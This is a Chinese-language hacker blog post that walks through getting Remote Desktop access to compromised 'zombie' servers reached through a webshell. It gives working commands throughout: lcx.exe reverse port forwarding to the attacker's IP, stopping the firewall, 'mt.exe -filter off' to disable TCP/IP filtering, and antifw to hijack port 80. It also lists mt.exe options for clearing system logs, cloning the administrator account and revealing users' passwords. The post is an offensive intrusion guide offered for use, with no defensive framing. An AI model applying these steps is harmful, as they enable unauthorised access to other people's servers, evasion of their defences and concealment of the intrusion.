對于開了3389，連接不上，有幾個方面的原因，我來總結(jié)下，哇咔咔，這幾天提好幾臺服務(wù)器都TM這樣，分析下，
原因1、遠(yuǎn)程桌面端口被更改。2、對方服務(wù)器處于內(nèi)網(wǎng)。3、防火墻攔截。4、TCP/IP安全限制。
好了，知道原因了，我們來一個一個思考解決方法（部分引用）：
遠(yuǎn)程桌面端口被更改解決方法：
現(xiàn)在一般的asp大馬都有探測服務(wù)器的功能，在權(quán)限還行的情況下都可以直接查看遠(yuǎn)程（Terminal Service）端口，或者可以查看注冊表也可以得到遠(yuǎn)程桌面端口，asp權(quán)限不行，在支持aspx的時候就換aspx查看注冊表。
對方服務(wù)器處于內(nèi)網(wǎng)解決方法：
這種情況我們可以使用lcx做端口轉(zhuǎn)發(fā)，不知道的或者沒有的就百度“lcx.exe下載”，我就不提供下載了。
使用方法：
1.上傳lcx.exe到目標(biāo)服務(wù)器可執(zhí)行目錄
2.本地主機(jī)啟動lcx.exe監(jiān)聽,命令:
lcx.exe -listen 1988 4567 // 監(jiān)聽1988端口并轉(zhuǎn)發(fā)到4567端口
在目標(biāo)主機(jī)運(yùn)行:
格式為:
lcx.exe -slave 你的IP 你監(jiān)聽的端口 肉機(jī)IP 要轉(zhuǎn)發(fā)的目標(biāo)主機(jī)端口
例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389
3.本地鏈接:127.0.0.1:1988
OK，有點(diǎn)小麻煩，不過還是很管用的，要是你也是內(nèi)網(wǎng)，你就做下端口映射就好了，映射到轉(zhuǎn)發(fā)回來的端口，哇咔咔。
4、防火墻攔截解決辦法：
一般還是先試試端口轉(zhuǎn)發(fā)，還是利用LCX，
使用方法：
lcx.exe -slave 你的IP 你監(jiān)聽的端口 肉機(jī) 要轉(zhuǎn)發(fā)的目標(biāo)主機(jī)端口
例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389
然后本地連接:127.0.0.1:1988 就搞定了。
如果還不行。。要是web是SYSTEM權(quán)限，直接停掉防火墻服務(wù)就沒問題了。
5、TCP/IP安全策略限制。
這個解決方法就有點(diǎn)多了，可以使用MT.EXE來關(guān)閉策略，
使用方法：
1.上傳mt.exe到目標(biāo)服務(wù)器可執(zhí)行目錄
2.執(zhí)行命令：mt.exe -filter off
這樣就關(guān)閉了TCP/IP限制了
選項(xiàng):
-filter —更改TCP/IP 過濾器的開頭狀態(tài)
-addport —添加端口到過濾器的允許列表
-setport —設(shè)置端口作為過濾器的允許列表
-nicinfo —列出TCP/IP 界面信息
-pslist —列出活動進(jìn)程
-pskill —殺毒指定進(jìn)程
-dlllist —列出指定進(jìn)程的DLL
-sysinfo —列出系統(tǒng)信息
-shutdown —關(guān)閉系統(tǒng)
-reboot —重啟系統(tǒng)
-poweroff —關(guān)閉電源
-logoff —注銷當(dāng)前用戶會話
-chkts —檢查終端服務(wù)信息
-setupts —安裝終端服務(wù)
-remts —卸載終端服務(wù)
-chgtsp —重置終端服務(wù)端口
-clog —清除系統(tǒng)日志
-enumsrv —列出所有服務(wù)
-querysrv —列出指定服務(wù)的詳細(xì)信息
-instsrv —安裝一個服務(wù)
-cfgsrv —更改服務(wù)配置
-remsrv —卸載指定服務(wù)
-startsrv —啟動指定服務(wù)
-stopsrv —停止指定服務(wù)
-netget —從http/ftp 下載
-redirect —端口重定向
-chkuser —列出所有賬戶、sid 和anti 克隆
-clone —克隆admin 到目標(biāo)
-never —設(shè)置賬戶看上去從未登錄
-killuser —刪除賬戶，甚至是 “guest” 也可刪除
-su —以Local_System 權(quán)限運(yùn)行進(jìn)程
-findpass —顯示所有已登錄用戶的口令
-netstat —列出TCP 連接
-killtcp —殺死TCP 連接
-psport —映射端口到進(jìn)程
-touch —設(shè)置文件日期和時間到指定值
-secdel —安全擦除文件或目錄占用的空間
-regshell —進(jìn)入一個控制臺注冊表編輯器
-chkdll —檢測gina dll 后門
上面只是一種方法，再說一種好用的方法吧，成功率灰常高，哇咔咔。
使用antifw.exe這個工具，
使用方法：
在cmd下輸入
antifw -s 運(yùn)行程序 停止iis將3389改為80
antifw -l 關(guān)閉程序?；謴?fù)iis
連接的時候直接連接他的80端口就OK了，內(nèi)網(wǎng)外網(wǎng)通殺！成功率比較高。但是這樣他網(wǎng)站就訪問不了。。。
沒事，上去了我們趕緊分析原因，排除萬難，把限制去掉，再給他還原80端口，哇咔咔。。。
By：Seay

最新評論